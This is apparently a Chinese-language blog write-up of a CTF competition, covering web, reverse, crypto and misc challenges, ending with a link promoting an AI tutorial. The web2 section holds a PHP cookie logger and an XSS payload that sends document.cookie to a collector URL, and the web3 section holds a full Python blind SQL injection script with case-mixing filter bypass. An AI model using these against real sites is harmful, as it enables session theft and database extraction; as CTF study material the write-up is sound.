總結說會的正題不難，不會的實在是難的可以…

web1 iphone6

直接將user-agent改成手機的就可以了，很簡單不截圖

web2 jshunt

這個題目我沒有調出來來，但是明顯就是xss，很困惑。
首先掃描了一下目錄發現了tmp目錄和up目錄。up目錄明顯就是我們上傳的jpg檔案，有檔案型別限制，但是沒有  MIME檢查，寫入後是base64加密後的內容。而tmp內容更是直截了當，可以構造<html><script src=></script></html>

<?phpif(@$_GET['cookie']){    $myfile = fopen("./1.txt", "a+");    fwrite($myfile
 
, $_GET['cookie']."\n");    fclose($myfile);}?>
   

    
1
    
2
    
3
    
4
    
5
    
6
    
7
   

test.html

<html><script src=wamp.html></script></html>
   

    
1
   

wamp.html(就是在這裡犯得二)

window.location.href="http://127.0.0.1/flag.php?cookie="+document.cookie
 

   

    
1
   

web3  繞過看門狗

非常簡單的注入，需要大小寫繞過而已，其他都可以繞過了。直接上指令碼吧，比sqlmap好用感覺

#_*_coding:utf-8_*_import hashlib import re,requestsurl = 'http://192.168.5.13/viewld.do?ldid=2%20aNd%20'temp=0def pre(string,pos,l,r):    global temp    if l>r:         return     mid=(l+r)/2    tempurl=url+'(seLect asCii(suBstr(('+string+') fROm '+str(pos)+' fOr 1))<='+str(mid)+')'    #print tempurl    html = requests.get(tempurl).text    #print html,len(html)    if len(html)>1200:        flag=1        temp=mid        temp=max(temp,mid)        pre(string,pos,l,mid-1)    else :        pre(string,pos,mid+1,r)flag=''def work(str):    global temp    global flag    for l in range(1,50):        temp=0        pre(str,l,30,130)        if temp>0 and temp !=30:            flag+=chr(temp)            print flag        else :            break#insert="seLect database()"  news#insert="SELeCT SCHEma_NaME FRoM infOrmation_schEma.SCHEmaTA liMit 1,1"#insert="SELeCT Table_NaME FRoM infOrmation_schEma.tabLES whEre TAbLE_SChEMA='news' liMit 1,1"#tb_admin   tb_flag#insert="SELeCT COLuMN_NaME FRoM infOrmation_schEma.COLuMNS whEre Table_NaME='tb_flag' liMit 0,1"#flaginsert="SELeCT flag FRoM tb_flag liMit 0,1"work(insert)#flag{1396265adbb760c86475304b98e3f61c}
   

    
1
    
2
    
3
    
4
    
5
    
6
    
7
    
8
    
9
    
10
    
11
    
12
    
13
    
14
    
15
    
16
    
17
    
18
    
19
    
20
    
21
    
22
    
23
    
24
    
25
    
26
    
27
    
28
    
29
    
30
    
31
    
32
    
33
    
34
    
35
    
36
    
37
    
38
    
39
    
40
    
41
    
42
    
43
   

reverse

這個逆向比較困難，我是投機取巧地找到了原題…但是這個題目是一個非常好的題目，是一個演算法，演算法本身有輪轉等工作，而且有可能有多解，非常好的題目，過一段時間會單獨復現一下。

Crypto

這個我也是迷了，好難猜啊…作業時密文，然後報紙中替換掉的是密文，根據語境猜測替換表是什麼…

Misc 1 別劫持的神祕禮物

大水題，直接在tcp流中找到訪問頁面的包，賬號密碼就在上面，連起來md5一下就好了。

Misc 2 找webshell

這個題目可是坑死我了…一開始像是既然是上傳的檔案，我就去找一下上傳的節點有什麼，發現什麼都沒有，後來一想人家可能藏到了別的地方，用seayfinder沒找到，然後在網上找了一個線上掃描shell的站，但是掃不出來…
下載他的安裝包離線掃掃描出來了，在include/include.php下存在一個pass就是flag了，具體他是做什麼的還沒來得及看，貌似是個大馬，只是根據提示做了出來^_^

總結：

我還是太菜了

再分享一下我老師大神的人工智慧教程吧。零基礎！通俗易懂！風趣幽默！還帶黃段子！希望你也加入到我們人工智慧的隊伍中來！https://blog.csdn.net/jiangjunshow